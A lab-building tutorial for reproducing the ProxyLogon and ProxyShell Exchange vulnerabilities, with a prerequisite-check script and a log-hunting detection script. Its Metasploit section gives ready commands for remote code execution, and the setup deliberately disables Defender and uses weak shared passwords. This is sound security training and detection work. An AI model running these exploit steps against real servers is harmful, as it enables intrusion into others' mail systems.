# Building a ProxyLogon and ProxyShell lab environment

ProxyLogon and ProxyShell were recent vulnerabilities published by Orange Tsai on his blog: https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html

He also gave a great talk at Defcon on the matter: https://www.youtube.com/watch?v=5mqid-7zp8k

I'm going to walk you through building a lab environment using Minimega. Minimega is a VM management tool and you can learn more about it from the [miniclass](http://ku.nz/miniclass/old.html).

Following the class, you will need to build a Kali VM with an updated Metasploit:

```
apt update
apt upgrade metasploit-framework
```

You will also need to build a VM of Windows Server 2016. You can get a trial iso from MS: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016

The Exchange 2016 installer doesn't work with Windows Server 2019, so be sure to grab a copy of Windows Server 2016.

After you have those two VMs, here are the commands I used to boot them in a lab environment, using the Windows image as the nameserver for test.com. This makes configuration really straightforward, and once AD services are installed the domain test.com will function as expected.
```
shell echo launching minirouter
clear vm config
vm config filesystem /root/images/uminirouterfs/
vm config net experiment,net1
vm config preinit /root/images/uminirouterfs/preinit
vm launch container r0
vm start r0
shell echo configuring routers
router r0 interface 0 1.0.0.1/24
router r0 dhcp 1.0.0.1 range 1.0.0.2 1.0.0.254
router r0 dhcp 1.0.0.1 static 00:16:36:00:00:03 1.0.0.3
router r0 dhcp 1.0.0.1 static 00:16:36:00:00:04 1.0.0.4
router r0 upstream /test.com/1.0.0.3
router r0 commit
clear vm config
vm config memory 16384
vm config vcpus 4
vm config disk /root/images/server2016.qcow2
vm config snapshot false
vm config net experiment,net1,00:16:36:00:00:03
vm launch kvm exchange
vm config memory 4096
vm config vcpus 2
vm config net experiment,net1,00:16:36:00:00:04
vm config disk /root/images/kali.qcow2
vm config snapshot false
vm launch kvm kali
vm start all
```

## Creating a Domain Controller with Users

On Windows Server 2016: From Server Manager (loaded at boot) -> Dashboard -> Add Roles and Features -> Next -> Next -> Next -> Select Active Directory Domain Services -> Follow Prompts -> When finished click Promote to DC -> Add a new forest -> domain: test.com -> NetBIOS: test

Or you can do the same from PowerShell as admin (the Install-ADDSForest switch is `-NoRebootOnCompletion`; the cmdlet will prompt for the DSRM password):

```
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "test.com" -DomainNetBiosName "test" -InstallDns:$true -NoRebootOnCompletion:$true
Restart-Computer
```

Once rebooted you will need to make an account which will be used to install Exchange:

```
net user da P@ssw0rd1 /add
net localgroup administrators da /add
net group "domain admins" da /add
net group "enterprise admins" da /add
net group "schema admins" da /add
```

You can also make normal user accounts for any mailboxes you want:

```
net user user1 P@ssw0rd1 /add
net user user2 P@ssw0rd1 /add
net user user3 P@ssw0rd1 /add
```

You may also like to disable Windows Defender and Windows Updates:

- gpedit -> Computer Configuration > Administrative Templates > Windows Components > Windows Defender -> Turn off Windows Defender -> Right click edit -> Enable
- gpedit -> Computer Configuration > Administrative Templates > Windows Components > Windows Update -> Configure Automatic Updates -> Right click edit -> Disable

## Installing Exchange 2016 on Server 2016

Download the Cumulative Update 17 iso for Exchange Server 2016, which is available to anyone straight from MS. This can be used as an installer and installs a vulnerable version as part of the default configuration: https://www.microsoft.com/en-us/download/details.aspx?id=101448

The Exchange 2019 iso requires an MSDN subscription.

Attach the iso to the Windows Server 2016 VM, then log in as the da user and run setup.exe. The installer will check for various prerequisites such as .NET 4.8, UCMA 4.0, and Visual C++ 2013:

- https://support.microsoft.com/en-us/topic/microsoft-net-framework-4-8-offline-installer-for-windows-9d23f658-3b97-68ab-d013-aa3c3e7495e0
- https://www.microsoft.com/en-us/download/details.aspx?id=34992
- https://www.microsoft.com/en-us/download/details.aspx?id=40784

You will need to download and install these manually. You can bridge networking following the advanced configuration minirouter module in the miniclass, or you can create an iso with the dependencies using mkisofs and attach that iso to the VM.

You might find it helpful to disable IE Enhanced Security Configuration (which nags for permission to open every new website visited): Server Manager -> Local Server -> IE Enhanced Security Configuration: On -> Disable for admins and users

Once the prerequisites are installed, restart the installer. Get a beverage, as the process will take a few hours to do its thing.

When completed you should be able to log in from Kali at https://test.com/owa and be able to exploit it using the Metasploit modules.
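Rather than letting setup.exe fail three times, you can confirm the prerequisites are in place before launching it. The script below is an added example for this walkthrough, not part of the original post or of the Exchange installer; it assumes an elevated PowerShell on the Server 2016 VM, matches UCMA and the VC++ redistributable by the DisplayName prefixes under the Uninstall registry keys, and reads the documented .NET `Release` DWORD (528040 and above means 4.8).

```powershell
# Added example: pre-flight check for the three Exchange 2016 CU17 setup prerequisites.
# Assumptions: elevated PowerShell on the Server 2016 VM; products are matched by the
# DisplayName prefix of their Uninstall entries; .NET 4.8 is detected via Release >= 528040.

function Get-InstalledProducts {
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    Get-ItemProperty -Path $paths -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion
}

function Test-ExchangePrereqs {
    $products = Get-InstalledProducts
    $ndp = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' -ErrorAction SilentlyContinue

    # Ordered so the report prints in the same order setup.exe complains about them.
    $checks = [ordered]@{
        '.NET Framework 4.8 (Release >= 528040)' = [bool]($ndp -and $ndp.Release -ge 528040)
        'UCMA 4.0 Runtime' = [bool]($products | Where-Object DisplayName -like 'Microsoft Unified Communications Managed API 4.0*')
        'Visual C++ 2013 Redistributable' = [bool]($products | Where-Object DisplayName -like 'Microsoft Visual C++ 2013 Redistributable*')
    }

    foreach ($name in $checks.Keys) {
        $state = if ($checks[$name]) { 'OK     ' } else { 'MISSING' }
        Write-Host ("[{0}] {1}" -f $state, $name)
    }
    # True only when every prerequisite was found.
    return -not (@($checks.Values) -contains $false)
}

if (Test-ExchangePrereqs) {
    Write-Host 'All prerequisites present; run setup.exe from the CU17 iso.'
} else {
    Write-Host 'Install the missing items from the links above, then re-run this check.'
}
```

Run it once after installing the three downloads and again after the reboot setup.exe asks for; the .NET check in particular only turns green after the restart.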
## Attacking with Metasploit

```
msfconsole
use exploit/windows/http/exchange_proxylogon_rce
set RHOSTS 1.0.0.3
set LHOST 1.0.0.4
set EMAIL da@test.com
exploit
exit
use exploit/windows/http/exchange_proxyshell_rce
set RHOSTS 1.0.0.3
set LHOST 1.0.0.4
exploit
exit
```
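A lab like this is also a good place to see what the attack looks like from the server side. The script below is an added example, not part of the original post or of any Microsoft tooling; it applies the two HttpProxy log indicators Microsoft published for ProxyLogon (an `AnchorMailbox` of the form `ServerInfo~*/*` or a `BackEndCookie` of the form `Server~*/*~*`) to the Exchange VM's own logs. It assumes the default install path under `%ProgramFiles%` and that the logs parse as CSV with the `DateTime`, `ClientIpAddress`, `UrlStem`, `AnchorMailbox` and `BackEndCookie` columns; the sample rows embedded in it are constructed, not captured output.

```powershell
# Added example: hunt the Exchange HttpProxy logs on the lab server for the server-side
# request pattern the ProxyLogon module leaves behind.
# Assumptions: default Exchange install path; logs are CSV with the columns used below.

$LogRoot = Join-Path $env:ProgramFiles 'Microsoft\Exchange Server\V15\Logging\HttpProxy'

function Find-ProxyLogonRequests {
    param([Parameter(Mandatory)][object[]]$Rows)
    # Microsoft's published indicators: a proxied request whose routing target was
    # supplied by the client rather than resolved from a mailbox.
    $Rows | Where-Object {
        $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'
    }
}

function Get-HttpProxyRows {
    Get-ChildItem -Path $LogRoot -Recurse -Filter '*.log' -ErrorAction SilentlyContinue |
        ForEach-Object { Import-Csv -Path $_.FullName }
}

# Constructed sample rows (not real log output) so the filter can be exercised anywhere.
# Only the second and third rows should match.
$sample = @'
DateTime,ClientIpAddress,UrlStem,AnchorMailbox,BackEndCookie
2021-09-01T10:00:01.000Z,1.0.0.4,/owa/auth/logon.aspx,,
2021-09-01T10:00:05.000Z,1.0.0.4,/ecp/y.js,ServerInfo~exchange.test.com/autodiscover/autodiscover.xml,
2021-09-01T10:00:09.000Z,1.0.0.4,/owa/,,Server~exchange.test.com/1.0.0.3~2000000000
'@ | ConvertFrom-Csv

Find-ProxyLogonRequests -Rows $sample |
    Format-Table DateTime, ClientIpAddress, UrlStem, AnchorMailbox, BackEndCookie -AutoSize

# On the Exchange VM itself, after the Metasploit run, the same filter over the real logs
# shows the requests that came from the Kali box (1.0.0.4):
# Find-ProxyLogonRequests -Rows (Get-HttpProxyRows) |
#     Export-Csv .\proxylogon-hits.csv -NoTypeInformation
```

The `ClientIpAddress` column is what ties the hits back to the Kali VM in this lab; in a real environment it is the pivot for scoping which sources issued those requests and when, which is the starting point for the rest of the investigation.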